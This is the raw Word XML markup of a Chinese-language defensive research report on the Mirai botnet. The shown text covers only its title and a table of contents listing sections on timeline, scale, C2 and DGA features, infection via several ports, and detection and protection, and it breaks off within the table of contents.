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F21" w:rsidRDefault="007B1DCB" w:rsidP="007B1DCB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc472191665"/>
      <w:r>
        <w:t>Mirai</w:t>
      </w:r>
      <w:r w:rsidR="003C3F7B">
        <w:t>僵尸网络</w:t>
      </w:r>
      <w:r w:rsidR="00C6017E">
        <w:t>研究</w:t>
      </w:r>
      <w:r>
        <w:t>报告</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="000263D9" w:rsidRPr="000263D9" w:rsidRDefault="00BE7FAF" w:rsidP="00BE7FAF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>长安通信</w:t>
      </w:r>
      <w:r>
        <w:t>cDDoS</w:t>
      </w:r>
      <w:r w:rsidR="00FD20AE">
        <w:t>研究组</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:color w:val="auto"/>
          <w:kern w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="zh-CN"/>
        </w:rPr>
        <w:id w:val="-689828556"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w:rsidR="007E2F86" w:rsidRDefault="007E2F86">
          <w:pPr>
            <w:pStyle w:val="TOC"/>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:lang w:val="zh-CN"/>
            </w:rPr>
            <w:t>目录</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="007E2F86">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc472191665" w:history="1">
            <w:r w:rsidR="00FD245F" w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai</w:t>
            </w:r>
            <w:r w:rsidR="00FD245F" w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络研究报告</w:t>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191665 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00FD245F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191666" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>事件时间线</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191666 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191667" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络现状</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191667 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191668" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸网络规模</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191668 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191669" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>僵尸主机分布</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191669 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191670" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>C2</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>主机及</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>DGA</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>特征</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191670 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191671" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>感染原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191671 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191672" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai(23)</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>感染原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191672 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191673" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai(7547)</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>感染原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191673 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191674" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mirai(6789)</w:t>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>感染原理</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191674 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191675" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>鉴别与防护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191675 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191676" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>受感染主机的症状与鉴别方式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191676 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="20"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="840"/>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191677" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>如何进行防护</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191677 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191678" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
              </w:rPr>
              <w:t>社区研究进展</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191678 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w:rsidR="00FD245F" w:rsidRDefault="00FD245F">
          <w:pPr>
            <w:pStyle w:val="10"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc472191679" w:history="1">
            <w:r w:rsidRPr="00674679">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:noProof/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>书目</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc472191679 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
